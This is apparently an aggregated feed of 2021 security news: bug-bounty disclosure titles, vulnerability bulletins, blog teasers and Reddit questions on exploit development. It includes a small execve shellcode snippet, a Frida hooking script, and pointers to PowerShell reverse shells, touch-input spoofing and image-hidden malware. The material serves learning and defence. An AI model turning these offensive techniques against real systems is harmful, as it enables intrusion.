    ZAP에 새로운 Addon이 추가됬습니다. 이 Addon을 이용하면 ZAP의 인증서, 즉 Root CA를 API나 Cli등으로 컨트롤할 수 있도록 기능이 지원됩니다. 이를 활용하면 Daemon 모드로 동작하거나 CI/CD Pipeline 등에서 사용 시 조금 더 쉽게 인증서 처리를 할 수 있게 됩니다. 오늘은 ZAP의 RootCA, 즉 인증서를 API/CLI의 Arguments 등으로 쉽게 처리할 수 있는 Network addon과 어떻게 동작하는지 알아보도록 합시다 🚀 Network addon Network addon은 특별한 기능이 있는 Addon은 아니고, ZAP의 Certificate 지원을 위해 추가된 Addon 입니다.

  • Open

    [译] Facebook 流量路由最佳实践:从公网入口到内网业务的全路径 XDP/BPF 基础设施(LPC, 2021)
    译者序 本文翻译自 Facebook 在 LPC 2021 大会上的一篇分享: From XDP to Socket: Routing of packets beyond XDP with BPF。 标题可直译为《从 XDP 到 Socket 的(全路径)流量路由:XDP 不够,BPF 来凑》,因为 XDP 运行 在网卡上,而且在边界和流量入口,再往后的路径(尤其是到了内核协议栈)它就管不 到了,所以引入了其他一些 BPF 技术来“接力”这个路由过程。另外, 这里的“路由”并非狭义的路由器三层路由,而是泛指 L3-L7 流量转发。 翻译时加了一些链接和代码片段,以更方便理解。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 引言 1.1 前期工作 1.2 Facebook 流量基础设施 1.3 面临的挑战 2 选择后端主机:数据中心内流量的一致性与无状态路由(四层负载均衡) 2.1 Katran (L4LB) 负载均衡机制 2.2 一致性哈希的局限性 2.2.1 容错性:后端故障对非相关连接的扰动 2.2.2 TCP 长连接面临的问题 2.2.3 QUIC 协议为什么不受影响 connection_id 完全无状态四层路由 2.3 TCP 连接解决方案:利用 BPF 将 backend server 信息嵌入 TCP Header 2.3.1 原理和流程 2.3.2 开销 数据开销:TCP header 增加 6 个字节 运行时开销:不明显 2.3.3 实现细节 监听的 socket 事件 维护 TCP flow -> server_id 的映射 server_id 的分配和同步 2.3.4 效果 2.3.5…

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
    Today we will understand how to Fuzz using Burp Suite. On Day 3, we had used dirbuster for the same purpose. Continue reading on Medium »  ( 2 min )

  • Open

    reflected xss on the path m.tiktok.com
    TikTok disclosed a bug submitted by semsem123: https://hackerone.com/reports/1394440 - Bounty: $1000
    IDOR the ability to view support tickets of any user on seller platform
    TikTok disclosed a bug submitted by lewaperbb: https://hackerone.com/reports/1392630 - Bounty: $2500
    [h1-2102] [Yaworski's Broskis] Suspected overcharge and chargebacks in PoS
    Shopify disclosed a bug submitted by c0rv4x: https://hackerone.com/reports/1089978 - Bounty: $500
    access to stack memory beyond array boundaries
    Open-Xchange disclosed a bug submitted by ihsinme: https://hackerone.com/reports/796555 - Bounty: $400
    File System Monitoring Queue Overflow
    ownCloud disclosed a bug submitted by ihsinme: https://hackerone.com/reports/881891
    Ability to add address without being an admin or staff in the store via wholesale store
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1279322 - Bounty: $500
    Unathorised access to admin endpoint on plus-website-staging5.shopifycloud.com
    Shopify disclosed a bug submitted by j0j0: https://hackerone.com/reports/1394982 - Bounty: $2900
  • Open

    Dynamic instrumentation of a C binary
    I am (a Frida noob) trying to write a script for Frida to capture and modify variables inside a C function. The code for my binary looks like this: int myfunc(int dummy) { return --dummy; } int main () { ... printf("%d\n", myfunc(15)); return 0; } My javascript looks like this: var myfunc_ptr = Module.findExportByName(null, "myfunc") Interceptor.attach(myfunc_ptr, { onEnter: function(args) { const source_string = args[0].readUtf8String(); console.log(source_string); args[0].writeUtf8String("999"); }, onLeave: function(retval) { // by now do nothing. } }) But it fails to update the value. Any help is appreciated ! :) submitted by /u/www_devharsh_me [link] [comments]  ( 1 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    PowerShell for Pentester: Windows Reverse Shell
    Today, we’ll explore how to acquire a reverse shell using Powershell scripts on the Windows platform. Table of Content Powercat Invoke-PowerShellTcp (Nishang) ConPtyShell Mini-reverse PowerShell The post PowerShell for Pentester: Windows Reverse Shell appeared first on Hacking Articles.  ( 7 min )
  • Open

    XMGoat - An Open Source Pentesting Tool for Azure - XM Cyber
    submitted by /u/dmchell [link] [comments]

  • Open

    Stored XSS in files.slack.com
    Slack disclosed a bug submitted by oskarsv: https://hackerone.com/reports/827606 - Bounty: $1000
    Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints
    Shopify disclosed a bug submitted by cthulhufhtagn: https://hackerone.com/reports/1115139 - Bounty: $500
    CSS injection via link tag whitelisted-domain bypass - https://www.glassdoor.com
    Glassdoor disclosed a bug submitted by zonduu: https://hackerone.com/reports/1250730 - Bounty: $100
    account takeover through password reset in url https://reklama.tochka.com/
    QIWI disclosed a bug submitted by anonymouus: https://hackerone.com/reports/1379842 - Bounty: $500
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    The mystery of the missing Mac release
    Some eagle-eyed users of Burp Suite have noticed that there is no Mac release of Burp Suite 2021.10.2. Why is this release missing in action? Well, the true story is rather mundane, and unfortunate. F  ( 2 min )
  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )
  • Open

    APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
    A persistent and determined APT actor has expanded beyond Zoho ManageEngine ADSelfService Plus and begun an active campaign against ServiceDesk Plus. The post APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus appeared first on Unit42.

  • Open

    Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
    submitted by /u/dmchell [link] [comments]
    Tracking a P2P network related to TA505
    submitted by /u/dmchell [link] [comments]
  • Open

    【安全通报】惠普多功能打印机多个高危漏洞(CVE-2021-3923...
    近日,惠普多功能打印机多个高危漏洞(CVE-2021-39237&CVE-2021-39238)细节公开,惠普官方曾于11月1日发布安全公告。攻击者可利用这些漏洞获取敏感信息、进行远...
  • Open

    【安全通报】惠普多功能打印机多个高危漏洞(CVE-2021-3923...
    近日,惠普多功能打印机多个高危漏洞(CVE-2021-39237&CVE-2021-39238)细节公开,惠普官方曾于11月1日发布安全公告。攻击者可利用这些漏洞获取敏感信息、进行远...
  • Open

    Faster Chrome - Let The Compiler do the work
    Chrome is fast, but there's always room for improvement. Often, that's achieved by carefully crafting the algorithms that make up Chrome. But there's a lot of Chrome, so why not let computers do at least some part of our work? In this installment of The Fast And the Curious, we'll show you several changes in how we build Chrome to achieve a 25.8% higher score on Speedometer on Windows and a 22.0% increase in browser responsiveness. Why speed? So why do we care about performance benchmarks? It's not a simple "higher numbers is better" chasing of achievements - performance was so important to Chrome that we embedded in our core principles, the "4Ss" - Speed, Security, Stability, Simplicity. And speed matters because we want a browser that responds quickly. Speed matters so much because we…
  • Open

    Welley Christ is trending as the world’s perfect man and he needs a deal for a record label and…
    Making millions have been a problem for Welley Christ he needs a record label viral topic about Welley Christ trending topic about Welley… Continue reading on Medium »  ( 1 min )
  • Open

    Is passing data to a driver a collection of loads/Mov instructions?
    submitted by /u/WillyRaezer [link] [comments]
    Android touch input spoofing?
    How could I spoof the input to the touch screen on any app using regular code and not already root? submitted by /u/WillyRaezer [link] [comments]
  • Open

    Play Your Cards Right: Detecting Wildcard DNS Abuse
    Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks. The post Play Your Cards Right: Detecting Wildcard DNS Abuse appeared first on Unit42.
  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )
  • Open

    Privilege Escalation leads to trash other users comment without having admin rights.
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1307943 - Bounty: $200
    Stored XSS on https://community.my.games/ (Add Post)
    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

    【安全通报】泛微E-Office文件上传漏洞(CNVD-2021-49104)
    近日,网络上出现 泛微E-Office 文件上传漏洞(CNVD-2021-49104)在野利用事件,攻击者可通过该漏洞在影响...
  • Open

    【安全通报】泛微E-Office文件上传漏洞(CNVD-2021-49104)
    近日,网络上出现 泛微E-Office 文件上传漏洞(CNVD-2021-49104)在野利用事件,攻击者可通过该漏洞在影响...
  • Open

    Paid CTF partner
    Hi, Am doing a couple of CTFs next Sunday and Monday, and I have a shortage in Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note : I can cover all other categories, and know the basics of pwn and reverse but I don't have a team that's why am asking for help. and as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become waste of time for whoever wanna help. submitted by /u/riskyg33k [link] [comments]  ( 1 min )
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    En el primer post de este blog vamos a examinar un challenge de Hack The Box llamado “AbuseHumanDB” y como efectuar un Blind XS Leak+ CORS… Continue reading on Medium »  ( 2 min )

  • Open

    Execve shellcode not working
    global _start start: ; =================== EXECVE ====================== ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md xor eax, eax mov al, 11 ; execve sys call no 11 xor edx, edx ; reverse the command string and store it /bin/bash/0 push edx ; push the null of the string push 0x686c6c61 ; this shit represent ls -allh in reverse and connverted to hex push 0x2d20736c mov ebx, esp ;sec arg to the execve is the pointer to the strin to execve mov ecx, edx ; mov 3rd arg to execve can be null int 0x80 ;================= EXIT PROGRAM ===================== ; exit = sys call no 1 -> must go to eax ; args to sys call is return code of the program -> must go to ebx ;xor eax, eax ; eax = 0 ;add eax, 1 ; eax = 1 ;xor ebx, ebx ; ebx = 0 ;add bl, 4 ;inc ebx ;int 0x80 see the push edx then next 2 instruction, its a command ls -allh command this command isnt executing, but /bin//sh is working with this. is their any problem with this. running program, sh is a program too its working but ls with args. ;;;;;; after compiling and dumping with objdump ;;;;;;;;; ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000 f_output: file format elf32-i386 Disassembly of section .text: 08049000 : 8049000: 31 c0 xor eax,eax 8049002: b0 0b mov al,0xb 8049004: 31 d2 xor edx,edx 8049006: 52 push edx 8049007: 68 61 6c 6c 68 push 0x686c6c61 804900c: 68 6c 73 20 2d push 0x2d20736c 8049011: 89 e3 mov ebx,esp 8049013: 89 d1 mov ecx,edx 8049015: cd 80 int 0x80 ​ submitted by /u/dude_sourav [link] [comments]  ( 3 min )
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…  ( 6 min )

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33  ( 4 min )

  • Open

    Long names and muscle memory?
    Hi I have a general programming question, I have tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer [link] [comments]  ( 1 min )
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )
  • Open

    [译] 为 K8s workload 引入的一些 BPF datapath 扩展(LPC, 2021)
    译者序 本文翻译自 LPC 2021 的一篇分享: BPF datapath extensions for K8s workloads。 作者 Daniel Borkmann 和 Martynas Pumputis 都是 Cilium 的核心开发。 翻译时补充了一些背景知识、代码片段和链接,以方便理解。 翻译已获得作者授权。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 0 引言 0.1 Cilium datapath 基础 0.2 Cilium datapath 几个新变化 0.3 本文提纲 1 cgroup v1/v2 干扰问题 1.1 普通节点:v1/v2 同时挂载没问题 1.2 嵌套虚拟化节点 1.2.1 KIND (K8s-In-Docker) 1.2.2 KIND-worker-node cgroup layout 1.2.3 带来的问题 1.3 问题分析:历史代码假设 v1/v2 不会同时启用 1.4 解决方案:v1/v2 字段拆开 2 TCP Pacing 2.0 基础 2.0.1 TCP Pacing(在每个 RTT 窗口内均匀发送数据) 2.0.2 TCP BBR 算法 2.0.3 tc FQ (Fair Queue) 2.1 K8s pod 限速 2.2 Cilium 中 pod egress 限速的实现 2.3 下一步计划:支持 TCP Pacing & BBR 2.3.1 目前无法支持的原因:跨 netns 导致 skb 时间戳被重置 2.3.2 为什么跨 netns 时,skb->tstamp 要被重置 2.3.3 能将 skb->tstamp 统一到同一种时钟吗? 2.4 中场 Q&A 环节 问题 1:net_t…

  • Open

    Tips for DFIR Analysts, pt. V
    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…  ( 7 min )
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Observing Attacks Against Hundreds of Exposed Services in Public Clouds
    Insecurely exposed services are common misconfigurations in cloud environments. We used a honeypot infrastructure to learn about attacks against them. The post Observing Attacks Against Hundreds of Exposed Services in Public Clouds appeared first on Unit42.
  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs Continue reading on Medium »
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice… Continue reading on Medium »  ( 5 min )
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi , I am beginner to Vulnerability research. Have some experience in ctf and exploit challenges. The problem that I am facing challenges while auditing code either in c/c++ or Assembly manually. I missed many points while searching potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing c++ developed binary in IDA . So I want to know some advice or any tutorials or books to achieve them . Also in windbg crash let’s say there is a crash happened. How to determine which classes of vulnerability it is. .please let me know guys . Thanks. submitted by /u/crypt3r [link] [comments]  ( 2 min )

  • Open

    The "serial offender" #sexually assaulted an innocent minor girl and fled the scene.
    #Sexually assaulted an innocent minor #girl Continue reading on Medium »  ( 1 min )

  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset? gdb-peda$ jmp esp 0x40061e : jmp rsp 0x400743 : call rsp 0x60061e : jmp rsp 0x600743 : call rsp submitted by /u/Bahariasaurus [link] [comments]  ( 2 min )
  • Open

    【安全通报】Metabase 敏感信息泄露漏洞(CVE-2021-41277)
    近日,metabase 爆出敏感信息泄露漏洞,该漏洞 CVSS3 评分高达 9.9。攻击者可在未经身份验证的情况下获取系统敏感信息。
  • Open

    【安全通报】Metabase 敏感信息泄露漏洞(CVE-2021-41277)
    近日,metabase 爆出敏感信息泄露漏洞,该漏洞 CVSS3 评分高达 9.9。攻击者可在未经身份验证的情况下获取系统敏感信息。

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    [译] [论文] 可虚拟化第三代(计算机)架构的规范化条件(ACM, 1974)
    译者序 本文翻译自 1974 年关于可虚拟化计算机架构(即能支持 VM)的经典 论文: Popek, Gerald J., and Robert P. Goldberg. "Formal requirements for virtualizable third generation architectures." Communications of the ACM 17.7 (1974): 412-421. 虽然距今已半个世纪,但这篇文章的一些核心思想仍未过时。特别是,它在最朴素的层面 介绍了虚拟机是如何工作的(就像 (译) RFC 1180:朴素 TCP/IP 教程(1991) 在最朴素的层面介绍 TCP/IP 是如何工作的一样,虽然本文更晦涩一些),这些内容对理解虚拟化的底层原理有很大帮助。 第 1~4 代计算机架构的介绍可参考 Evolution of Computers from First Generation to Fourth Generation: 第一代:1940 – 1958 第二代:1958 – 1964 第三代:1964 ~ 1974,特点: 使用集成电路取代晶体管 High-level 编程语言 磁质存储 第四代:1974 ~ 今 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1. 虚拟机概念(Virtual Machine Concepts) 1.1 虚拟机(VM)和虚拟机监督器(VMM) 1.2 VMM 特点 1.2.1 一致性:程序在 VM 中执行与在真实机器上执行结果相同 1.2.2 高效性:大部分 VM 指令直接在硬件上执行 1.2.3 完全控制系统资源 1.3 虚拟机(VM)的定义 2. 一种第三代计算机模型(A Model of Third Generation M…

  • Open

    Simplified Storage Controls
    Posted by Theodore Olsauskas-Warren At Chrome, we’re always looking for ways to help users better understand and manage privacy on the web. Our most recent change provides more clarity on controlling site storage settings. Starting today, we will be rolling out this change to M97 Beta, we will be re-configuring our Privacy and Security settings related to data a site can store (e.g. cookies). Users can now delete all data stored by an individual site by navigating to Settings > Privacy and Security > Site Settings > View permissions and data stored across files, where they’ll land on chrome://settings/content/all. We will be removing the more granular controls found when navigating to Settings > Privacy and Security > Cookies and other site data > See all cookies and site data at chrome:/…
    Chrome 97: WebTransport, New Array Static Methods and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links. Chrome 97 is beta as of November 18, 2021. Preparing for a Three Digit Version Number Next year, Chrome will release version 100. This will add a digit to the version number reported in Chrome's user agent string. To help site owners test for the new string, Chrome 96 introduces a runtime flag that causes Chrome to return '100' in its user agent string. This new flag called chrome://flags/#force-major-version-to-100 is available from Chrome 96 onward. For more information, see Force Chrome major version to 100 in the User-Agent string. Features in this Release Auto-expand D…
  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploitdev or vulnerability research. I am not looking for any revenue I just need a practical experience. Is there a way to find an internship in such a field as non-american? submitted by /u/botta633 [link] [comments]  ( 1 min )
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and i know that The Shellcoder’s Handbook is recommended but does it still hold up in 2021? submitted by /u/milkshakemahn [link] [comments]  ( 1 min )

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2...
    近日,Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。  ( 1 min )
  • Open

    【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2...
    近日,Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。  ( 1 min )
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )

  • Open

    【安全通报】Hadoop Yarn RPC服务未授权访问漏洞
    近日,网络上出现 Hadoop Yarn RPC 服务未授权访问漏洞的在野利用事件,攻击者可在未经过身份验证的情况下通过该漏洞在影响主机执行任意命令。  ( 1 min )
  • Open

    【安全通报】Hadoop Yarn RPC服务未授权访问漏洞
    近日,网络上出现 Hadoop Yarn RPC 服务未授权访问漏洞的在野利用事件,攻击者可在未经过身份验证的情况下通过该漏洞在影响主机执行任意命令。  ( 1 min )
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Partitioning Chrome's Code for Faster Launch Times on Android
    Mobile devices are generally more resource constrained than laptops or desktops. Optimizing Chrome’s resource usage is critical to give mobile users a faster Chrome experience. As we’ve added features to Chrome on Android, the amount of Java code packaged in the app has continued to grow. In this The Fast and the Curious post we show how our team improved the speed and memory usage of Chrome on Android with Isolated Splits. With these improvements, Chrome on Android now uses 5-7% less memory, and starts and loads pages even faster than before. The Problem For Android apps (including Chrome on Android), compiled Java code is stored in .dex files. The user's experience in Chrome on Android is particularly sensitive to increases in .dex size due to its multi-process architecture. On Android,…
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22  ( 3 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )
    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges in a large period. One of… Continue reading → Golden Certificate  ( 5 min )

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio [link] [comments]

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local bsides. I then was able to present at IEEE southeastcon, which got me a job as a security engineer before graduating. -----‐ 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) should I go the pentester route and then exploit dev? 3) do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in powershell, python, and recently, go. I know C but hardly. 4) should I just shaddup and start learning? I'd assume that's get a better grip on primitives, RoP and C. submitted by /u/xnrkl [link] [comments]  ( 3 min )
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0  ( 2 min )

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3  ( 3 min )
  • Open

    【安全通报】PAN GlobalProtect Portal 内存损坏漏洞(CVE-...
    近日,Palo Alto Networks (PAN) 发布安全公告,修复了Palo Alto Networks GlobalProtect portal 和 gateway interfaces 中的内存损坏漏洞。未经身份验证的攻击...  ( 1 min )
  • Open

    【安全通报】PAN GlobalProtect Portal 内存损坏漏洞(CVE-...
    近日,Palo Alto Networks (PAN) 发布安全公告,修复了Palo Alto Networks GlobalProtect portal 和 gateway interfaces 中的内存损坏漏洞。未经身份验证的攻击...  ( 1 min )

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0  ( 2 min )

  • Open

    Chrome Dev Summit 2021: Moving toward a more powerful and private web
    By Paul Kinlan, Lead for Chrome Developer Relations The big day is finally here. Today, at Chrome Dev Summit 2021 we shared some of the highlights of what we've been working on — the latest product updates, vision for the web's future and examples of best-in-class web experiences. Over the past year, we've also had a lot of feedback that you want to spend more time learning from and working with the Chrome team and other industry experts. I'm excited to share with you that we've opened up a lot of spaces for 1:1 office hours, workshops and learning lounges to give you more opportunity to connect with the Chrome team. It's been a busy year for us all and with the continued shift of people moving more of their lives online, it has been more important than ever for us to continue investing …

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )
  • Open

    Run on OS Login
    Users want frequently used applications such as Email, Chat, and other productivity apps to automatically start when they log in to their devices. Auto-starting these apps at login streamlines the user experience as users don't have to manually start apps after logging into their devices. Windows, Mac, and Linux devices allow users to configure native apps to be launched automatically on startup. In Chrome 91, we introduced the Run on OS Login feature. With the launch of this feature, users can now configure desktop web apps to launch automatically when they log-in to the device on Windows, Mac, and Linux devices. Installed apps will not be permitted to automatically enable themselves to run when the user logs in. A manual user gesture will always be required. To configure apps to run on OS login, open Chrome browser. Navigate to chrome://apps or click the ‘Apps' icon in your bookmark bar (example below). To configure an app to start at login, first right click on it. From the context menu, select ‘Start app when you sign in' and you are all set. Next time when you log in to your device, the app will automatically launch on its own. To disable this feature for an app, navigate to chrome://apps. Right click on the app to bring up the context menu and deselect the option, ‘Start app when you sign in'. Apps launched through Run on OS Login are launched only after the device is running. ‘Run on OS Login' is a browser only feature and doesn't expose any launch source information to app developers. We're continuously improving the web platform to provide safe, low friction ways for users to get their day-to-day tasks done. Support for running installed web apps on OS login is a small but significant step to simplifying the startup routine for users that want apps like chat, email, or calendar clients to start as soon as they turn on their computer. As always, we're looking forward to your feedback. Your input will help us prioritize next steps! Posted by Pratyush Sinha

  • Open

    Searching, browsing, and shutdown Chrome performance improvements
